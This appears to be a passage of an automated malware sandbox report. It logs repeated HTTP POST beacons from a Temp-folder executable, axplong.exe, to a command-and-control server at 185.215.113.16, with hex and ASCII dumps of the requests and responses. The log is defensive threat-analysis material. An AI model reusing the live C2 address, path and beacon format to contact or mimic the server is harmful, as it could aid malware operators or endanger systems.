                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:05.025235891 CEST  196  IN  HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  1           192.168.2.6  65061        185.215.113.16  80                1924  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                  Sep 27, 2024 11:30:05.143078089 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:05.844012022 CEST  219  IN  HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:05 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:05.910186052 CEST  314  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:06.143379927 CEST  196  IN  HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  2           192.168.2.6  65062        185.215.113.16  80                1924  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                  Sep 27, 2024 11:30:06.262881994 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:06.969969988 CEST  219  IN  HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:06.970972061 CEST  314  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:07.201378107 CEST  196  IN  HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  3           192.168.2.6  65063        185.215.113.16  80                1924  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                  Sep 27, 2024 11:30:07.309784889 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:08.027483940 CEST  219  IN  HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:08.028548956 CEST  314  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:08.258482933 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:08 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  4 | 192.168.2.6 | 65064 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:08.375638008 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:09.085366964 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:08 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:09.086894035 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:09.317621946 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:09 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  5 | 192.168.2.6 | 65065 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:09.435410023 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:10.160864115 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:10.161812067 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:10.465637922 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  6 | 192.168.2.6 | 65066 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:10.575356960 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:11.293389082 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:11.294153929 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:11.524995089 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  7 | 192.168.2.6 | 65067 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:11.640261889 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:12.346571922 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:12.348256111 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:12.579307079 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  8 | 192.168.2.6 | 65068 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:12.702795029 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:13.421040058 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:13.421866894 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:13.653191090 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  9 | 192.168.2.6 | 65069 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:13.763535976 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:14.455089092 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:14 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:14.455976963 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:14.678169012 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:14 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  10 | 192.168.2.6 | 65070 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:14.794277906 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:15.485001087 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:15.485976934 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:15.707859039 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  11 | 192.168.2.6 | 65071 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:15.825481892 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:16.532732010 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:16 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:16.533512115 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:16.764434099 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:16 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  12 | 192.168.2.6 | 65072 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:16.872104883 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:17.579579115 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:17 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:17.580671072 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:17.816270113 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:17 GMT
